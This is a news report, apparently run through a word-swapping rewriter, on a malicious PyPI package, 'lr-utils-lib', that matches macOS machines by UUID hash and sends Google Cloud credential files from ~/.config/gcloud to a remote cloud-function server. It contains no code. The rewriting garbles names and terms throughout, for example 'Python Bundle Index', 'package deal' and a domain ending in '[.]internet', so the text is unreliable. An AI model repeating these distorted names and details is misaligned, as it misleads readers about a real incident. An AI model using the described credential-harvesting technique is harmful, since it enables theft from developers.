Cybersecurity researchers have found a malicious package deal on the Python Bundle Index (PyPI) repository that targets Apple macOS programs with the purpose of stealing customers’ Google Cloud credentials from a slim pool of victims.
The package deal, named “lr-utils-lib,” attracted a complete of 59 downloads earlier than it was taken down. It was uploaded to the registry in early June 2024.
“The malware makes use of a listing of predefined hashes to focus on particular macOS machines and makes an attempt to reap Google Cloud authentication knowledge,” Checkmarx researcher Yehuda Gelb stated in a Friday report. “The harvested credentials are despatched to a distant server.”
An essential side of the package deal is that it first checks if it has been put in on a macOS system, and solely then proceeds to match the system’s Universally Distinctive Identifier (UUID) in opposition to a hard-coded listing of 64 hashes.
If the compromised machine is amongst these specified within the predefined set, it makes an attempt to entry two information, particularly application_default_credentials.json and credentials.db, positioned within the ~/.config/gcloud listing, which comprise Google Cloud authentication knowledge.
The captured data is then transmitted over HTTP to a distant server “europe-west2-workload-422915[.]cloudfunctions[.]internet.”
Checkmarx stated it additionally discovered a pretend profile on LinkedIn with the identify “Lucid Zenith” that matched the package deal’s proprietor and falsely claimed to be the CEO of Apex Corporations, suggesting a attainable social engineering aspect to the assault.
Precisely who’s behind the marketing campaign is at the moment not identified. Nevertheless, it comes greater than two months after cybersecurity agency Phylum disclosed particulars of one other provide chain assault involving a Python package deal referred to as “requests-darwin-lite” that was additionally discovered to unleash its malicious actions after checking the UUID of the macOS host.
These campaigns are an indication that menace actors have prior data of the macOS programs they wish to infiltrate and are going to nice lengths to make sure that the malicious packages are distributed solely to these specific machines.
It additionally speaks to the techniques malicious actors make use of to distribute lookalike packages, aiming to deceive builders into incorporating them into their functions.
“Whereas it’s not clear whether or not this assault focused people or enterprises, these sorts of assaults can considerably impression enterprises,” Gelb stated. “Whereas the preliminary compromise often happens on a person developer’s machine, the implications for enterprises could be substantial.”
